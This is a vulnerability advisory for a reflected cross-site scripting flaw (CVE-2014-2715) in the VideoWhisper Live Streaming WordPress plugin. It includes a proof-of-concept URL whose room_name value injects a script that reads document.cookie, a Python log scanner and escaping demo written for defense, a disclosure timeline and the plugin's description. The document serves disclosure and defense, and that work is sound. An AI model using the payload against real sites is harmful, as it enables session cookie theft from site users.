wp-plugin : videowhisper-live-streaming-integration – A3-Cross-Site Scripting (XSS)

 

Plugin Details

 

Plugin Name : videowhisper-live-streaming-integration

Affected Version : 4.27.2 (and most probably lower versions, if any)

Vulnerability : A3-Cross-Site Scripting (XSS)

Identified by : Anant Shrivastava


Technical Details

 

Minimum Level of Access Required : Unauthenticated

PoC (Proof of Concept) :

http://localhost/wp-content/plugins/videowhisper-live-streaming-integration/ls/vv_login.php?room_name=%27%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%26

Vulnerable Parameter : room_name

Trac ChangeLog : https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=833654%40videowhisper-live-streaming-integration&old=833649%40videowhisper-live-streaming-integration&sfp_email=&sfph_mail=

Note: The same vulnerability was present in a Drupal module.
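As an added example (not part of this advisory and not the plugin's own code), the following Python scans web-server access logs for requests to the vv_login.php endpoint whose room_name carries markup characters, and reconstructs the attribute sink to show why attribute-context escaping (the equivalent of htmlspecialchars with ENT_QUOTES or WordPress esc_attr) neutralizes the PoC above. The log lines and the exact form of the HTML sink are constructed assumptions.

```python
import re
import html
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not taken from the advisory). The first
# request carries the advisory's PoC query string; the second is a benign one.
SAMPLE_LOG = """\
203.0.113.5 - - [12/Jun/2014:10:01:02 +0000] "GET /wp-content/plugins/videowhisper-live-streaming-integration/ls/vv_login.php?room_name=%27%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%26 HTTP/1.1" 200 1532
198.51.100.7 - - [12/Jun/2014:10:02:15 +0000] "GET /wp-content/plugins/videowhisper-live-streaming-integration/ls/vv_login.php?room_name=lobby HTTP/1.1" 200 1498
"""

LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
VULN_PATH = "videowhisper-live-streaming-integration/ls/vv_login.php"
# Characters that let a value break out of an HTML attribute or tag context.
MARKUP_CHARS = set("<>'\"")


def suspicious_room_names(log_text):
    """Return (source_ip, decoded room_name) for vv_login.php requests whose
    room_name contains markup characters once URL-decoded."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.search(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if not parts.path.endswith(VULN_PATH):
            continue
        # parse_qs splits on '&' first, then percent-decodes each value,
        # so the trailing %26 in the PoC ends up inside the value.
        for value in parse_qs(parts.query, keep_blank_values=True).get("room_name", []):
            if MARKUP_CHARS & set(value):
                hits.append((line.split()[0], value))
    return hits


def render_room_field(room_name, escape=True):
    """Hypothetical reconstruction of the sink: the value lands inside a
    single-quoted attribute, which is why the PoC opens with '>. With
    quote=True, html.escape also encodes both quote characters, so the
    payload can no longer close the attribute or the tag."""
    value = html.escape(room_name, quote=True) if escape else room_name
    return f"<input type='hidden' name='room_name' value='{value}'>"
```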

 

Disclosure Timeline

 

Vendor Contacted : 2014-01-02

Plugin Status : Updated on 2014-01-06

Public Disclosure : June 12, 2014

CVE Number : CVE-2014-2715

Plugin Description :

VideoWhisper Live Streaming software integrates web applications to:
1. Broadcast video live,
2. Embed live video streaming and chat,
3. Embed live video streaming only.

Latest version includes:
* codec and quality settings
* iOS transcoding support for iPhone, iPad playback
* automated detection of iOS
* usage permissions by role, email, id, name
* premium channels
* limit broadcasting and watch time per channel
* stats
* P2P groups support for better, faster video streaming and lower rtmp server bandwidth usage
* channel setup and management page in frontend
* channel listings with live AJAX updates
* external broadcaster/player support with special RTMP side
* generate snapshots for external streams with special RTMP side
* custom ads in chat

Use this software to add to your site features like those of Twitch TV, Justin TV, UStream tv, Mogulus, LiveStream, Stickam, Blog tv, Live yahoo or their clones and alternatives.

Administrators can restrict access to broadcasting and watching to certain users.

The plugin also includes a linking widget, which additionally displays online broadcasters and their show names.

There is a settings page with multiple parameters and permissions (what users can broadcast and watch).

= BuddyPress integration =
If BuddyPress is installed, this will add a Live Stream tab to the group where users can watch live video and chat in real time. Admins can broadcast anytime from Admin > Live Streaming.

= Special requirements =
This plugin has requirements beyond regular WordPress hosting specifications: an RTMP host is needed for persistent connections to manage live interactions and streaming. More details about this, including solutions, are provided on the Installation section pages.
